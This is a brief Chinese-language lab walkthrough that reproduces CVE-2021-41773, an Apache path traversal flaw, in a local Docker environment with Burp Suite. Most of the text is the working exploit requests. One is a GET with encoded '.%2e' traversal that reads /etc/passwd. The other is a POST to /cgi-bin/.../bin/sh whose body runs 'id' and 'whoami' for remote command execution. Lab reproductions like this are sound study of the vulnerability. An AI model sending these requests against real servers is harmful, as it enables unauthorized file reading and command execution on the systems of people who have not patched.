CVE-202141773目录遍历(文件穿越)漏洞
Kali Linux的docker环境下
首先将环境下载到本地
进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。
等待文件下载……
安装完成后重启服务
访问本地的8080端口
打开Burpsuite,构造get参数
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
转换为post参数
修改命令为
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo Content-Type: text/plain; echo; id
在请求的正文下执行命令,此时漏洞产生,查看下id
whoami